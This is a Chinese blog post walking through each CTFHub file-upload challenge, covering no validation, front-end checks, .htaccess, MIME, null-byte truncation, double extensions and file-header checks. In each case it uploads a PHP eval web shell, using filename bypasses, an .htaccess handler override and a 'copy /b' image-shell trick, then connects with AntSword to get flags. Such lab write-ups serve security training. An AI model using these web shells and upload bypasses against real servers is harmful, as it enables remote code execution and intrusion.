CTFHUB:文件上传全部题目

于 2024-08-02 09:30:00 发布
阅读量182 收藏 1
点赞数 1
分类专栏: CTFHUB技能树 文章标签: web安全 网络安全 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/140858377
版权

目录

无验证

前端验证

.htaccess

MIME 绕过

00 截断

双写绕过

文件头检测

无验证

开启题目

1.php 一句话木马内容:
<?php @eval($_POST[cmd]);?>

上传一句话木马,发现上传成功

蚁剑连接

http://challenge-8b27d18368ecc25c.sandbox.ctfhub.com:10800/upload/1.php

在 “/var/www/html/flag_1791214435.php”发现了 flag

前端验证

开启题目

上传一个 1.jpg,内容是

<?php @eval($_POST[cmd]);?>

上传抓包,修改后缀为 php

放包,上传成功

蚁剑连接

http://challenge-3c592a81e5b9e7a6.sandbox.ctfhub.com:10800/upload/1.php

在“/var/www/html/flag_333327672.php”发现了 flag

.htaccess

开启题目

 .htaccess 文件内容:
 <FilesMatch "jpg">
 SetHandler application/x-httpd-php
 </FilesMatch>

 1.jpg内容:
 <?php @eval($_POST[cmd]);?>

先上传 .htaccess 文件,再上传 1.jpg 一句话木马

蚁剑连接

在“/var/www/html/flag_121311308.php”发现了 flag

MIME 绕过

开启题目

1.jpg内容:
<?php @eval($_POST[cmd]);?>

上传 1.jpg 一句话木马,抓包,修改后缀为 php

然后放包,上传成功

蚁剑连接

在“/var/www/html/flag_763422378.php”找到了 flag

00 截断

开启题目

查看页面源代码,发现接受值是 get

1.php内容:
<?php @eval($_POST[cmd]);?>

上传一句话木马 1.php,抓包,修改后缀为 jpg,添加 1.php%00

然后放包,上传成功

蚁剑连接

在“/var/www/html/flag_177321091.php”找到了 flag

双写绕过

开启题目

1.php内容:
<?php @eval($_POST[cmd]);?>

上传一句话木马 1.php,抓包,双写 php

然后放包,上传成功

蚁剑连接

在“/var/www/html/flag_484225427.php”找到了 flag

文件头检测

开启题目

1.php内容:
<?php @eval($_POST[cmd]);?>

截屏截一个很小很小的图片,保存为 png 格式,把 1.png 和 1.php 放在同一文件夹,在此目录打开 cmd, 使用以下命令把 1.png 和 1.php 合成为图片马

copy 1.png /b + 1.php /a shell.png

上传图片马 shell.png,抓包,修改后缀为 php

然后放包,上传成功

蚁剑连接

在“/var/www/html/flag_213312434.php”找到了 flag

燕雀安知鸿鹄之志哉.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
3.18号日报,ctfhubweb文件上传漏洞题目解法
03-18
本文将基于标题“3.18号日报,ctfhubweb文件上传漏洞题目解法”以及描述“文件上传漏洞”,详细介绍几种典型的文件上传漏洞利用方法及其技术细节。 #### 一、无验证直接上传一句话木马 这类题目是最简单的,...
CTFHUB:SSRF全部题目的过关教程
最新发布
weixin_68416970的博客
08-01 609
CTFHUB技能树——SSRF漏洞全部题目的详细教程(内外访问、伪协议读取文件、端口扫描、POST请求、上传文件、FastCGI协议、Redis协议、URL Bypass、数字IP Bypass、302跳转 Bypass、DNS重绑定 Bypass)
CTFHUB-文件上传
m0_64180167的博客
12-25 1245
注意要改名字 我在这出现了问题是我没改文件名字 一直上传失败 于是我又在后缀上加.php才上传成功。发现失败了 试错后发现 我们一定要把上传文件的后缀名改为。于是我们了解到i我们可以运用一句话木马 进行漏洞上传。我使用kali 在桌面新建立一个文件 输入该代码保存。注意 添加的不只是地址栏的URL 还要加上相对路径。发现可以了于是我们直接进入后台 发现flag。文件上传 并且提示我们是无限制的。出现了路径 于是我们打开中国蚁剑。打开我们安装蚁剑的文件夹。于是我们尝试直接上传。
CTFHUB——文件上传之前端验证
wuuconix's blog
09-01 1004
网页源码 <body> <h1>CTFHub 文件上传 - js前端验证</h1> <form action="" method="post" enctype="multipart/form-data" onsubmit="return checkfilesuffix()"> <label for="file">Filename:</label> <input type="file"
CTFHUB WEB 文件上传(上)
wwwwyyyrre的博客
04-26 788
在浏览器中显示的内容有 HTML、有 XML、有 GIF、还有 Flash ……抓一下包试试 正常情况都是可以抓到包的 如果在你的bp以及代理都没问题的情况下抓不到包并且还有提示该文件不允许上传 那么可能就是使用了js前端验证。因为这道题无验证 说明只要是文件就可以上传 因此上传一个一句话木马 php文件 再用蚁剑连接就能拿到其flag。在文件上传漏洞中 js函数的主要作用就是验证你上传的文件类型是不是它允许的文件类型。了解了这些 我们正式进入实战 这里用的是ctfhub技能树的文件上传题目
CTFHUB-web-文件上传
2301_79783285的博客
12-23 1287
htaccess是一个纯文本文件,存放着Apache服务器配置相关的指令。.htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。.htaccess的用途范围主要针对当前目录。注意:.htaccess文件(特别注意这里文件名不可随意更改,因为 .htaccess 是配置文件)博主这里帮大家把坑踩了,蚁剑死活连不上的原因。
CTFHub 文件上传
WXY17387209358的博客
02-04 815
ctfhub文件上传无限制
CTFHub | php://input
尼泊罗河伯的博客
06-08 1832
简单分析网页显示内容中的源代码,判断如果参数以 php:// 开头,那么执行 include 函数将参数值作为文件包含进来。否则,输出字符串 Hacker!!! 。
ctfhub 文件上传
qq_44640313的博客
01-17 424
ctfhub文件上传WP,最后两题用蚁剑,其余命令执行
CTFHub | 文件头检查
尼泊罗河伯的博客
04-18 1461
检查网页源代码,分析网页源代码没有发现明显的逻辑问题。这是一个简单的向服务器上传文件的代码,或许问题出现在没有对上传的文件进行验证,因为代码中没有做出一些上传判断。
ctfhub web全部做题记录(持续跟新)
01-08
【总结】在CTF Web挑战中,了解信息泄露、备份文件、源码解析、文件后缀、vim缓存、版本控制、弱口令、SQL注入、文件上传漏洞等概念至关重要。掌握这些技能可以帮助参赛者在比赛中发现并利用安全漏洞,获取flag。...
CTF神器:自动爆破PNG图片宽高并一键修复工具
12-29
这类题目通常需要参赛者挖掘图片的元数据或者利用图片格式的特殊性来发现隐藏的“Flag”。标题提到的“CTF神器:自动爆破PNG图片宽高并一键修复工具”就是为了解决此类问题而设计的。 这个神器的核心功能在于能够...
CTF赛题:将txt文件提取转换为图片(二维码)
10-20
提取txt文档中的大量0和1,生成二维码
非科班出身的你,如何转行web安全工程师?零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
07-29 407
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。那么,转行web安全工程师,你需要掌握哪些技能呢?对web安全工程师很感兴趣。对现在的工作没有热情。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 775
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1299
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
网络安全相关竞赛比赛
黑战士的博客
07-18 1442
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
CTFHUB SSRF文件上传
07-28
根据提供的引用内容,CTFHUB SSRF文件上传是指通过SSRF漏洞实现对目标服务器进行文件上传的攻击。在文件上传过程中,攻击者可以构造恶意请求,将文件上传到目标服务器上。具体的攻击方法可以使用常见的绕过技巧,如利用特殊字符、绕过短网址、利用特殊编码等。\[3\]同时,攻击者还可以通过修改请求头中的Content-Length字段来伪造文件大小,绕过服务器的文件上传限制。\[1\]\[2\]需要注意的是,CTFHUB SSRF文件上传是一种安全漏洞攻击,严禁在未授权的情况下进行此类行为,违法者将承担法律责任。 #### 引用[.reference_title] - *1* *2* *3* [CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)](https://blog.csdn.net/qq_31710331/article/details/119765578)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值